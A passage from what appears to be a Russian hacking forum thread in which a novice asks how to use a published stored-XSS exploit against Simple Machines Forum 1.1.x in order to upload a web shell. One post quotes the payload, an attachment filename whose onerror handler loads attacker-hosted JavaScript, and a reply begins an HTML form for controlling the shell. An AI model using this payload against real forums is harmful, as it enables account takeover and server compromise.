![]() |
SMF Active XSS (тупой я)
здрасте пишу тут редко... в основном читаю и пытаюсь сам разобраться... но похоже по жизни я тупой... короче прошу кое-что объснить если не трудно...
решил я сий метод опробовать... установил SMF 1.1.3 и решил все сделать как написано тут (http://forum.antichat.ru/thread42244-SMF.html) Значит узнать есть ли в этой версии "Отсутствует фильтрация atachment filename" я не знал как ... но там написано 1.1.2... поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html) но там про это ни слова поэтому решил попробовать (я вам грил я нуб) ну да ладно значит начал тока готовиться(:D) тупо скопировал ваш скрипт и тут подумал а нужно ли в нем что либо менять? в принципе это мой первый вопрос... ну короче я ничего не менял сохранил его ну и все... (зы решил я залить шелл) тут возник еще один вопрос Код:
name<img src=. width=1 height=1 onerror=javascript:var s=document.createElement('script');s.src='http: //site.com/smfexp.js';document.documentElement.firstChild. appendChild(s);>.txtи видимо я должен буду туда ссылку на файл подставить? эт уже 3 или 4 вопрос... еще не понял Цитата:
ps сразу грю сильно не ругайтесь... ps2 я понимаю скорее всего в версии 1.1.3 это уже исправлено но тогда представьте что я это делал на версии 1.1.2 ..хотя бы поясните ост вопросы если не трудно ps3 заранее пасиб |
Цитата:
а то что выше.. это не исполнение комманд.. это xss, читай маны |
Прочитал что ты там написал понял только последний твой вопрос... Вот его тебе обясню подробнее...
После заливки шела берешь создаешь у ся на компе вот такую html страницу: Код:
<form action="+++адрес скрипта+++" method="post"> |
вот тут есть несколько примероф, может что полезнова для себя отыщеш
http://forum.antichat.ru/thread43633.html |
спасибо
сейчас буду ознакамливаться только куда сувать сам шелл? его адрес? |
Цитата:
И был ответ (читать с цитаты): _http://www.simplemachines.ru/index.php/topic,2260.msg13666.html#msg13666 Ссылка на модуль (естественно, все на английском): _http://www.modsecurity.org/download/index.html Хочу узнать, это гон? |
мде
короче все что было (в моих силах) я сделал... понятно что профы взломают но мне не удалось... поюзал сплойт попробывал чрез аватарку фотку итд... стоят ограничения везде... сканил сканером ничего особо важного=( похоже мне такой сайт с форумом который уже залатан... в принципе похоже что Smf так свой баг и не исправил.... спасиб всем...=) пойдем дальше+) |
Лавочку прикрыли =/
_http://www.simplemachines.org/community/index.php?topic=196380.0 |
| Время: 22:56 |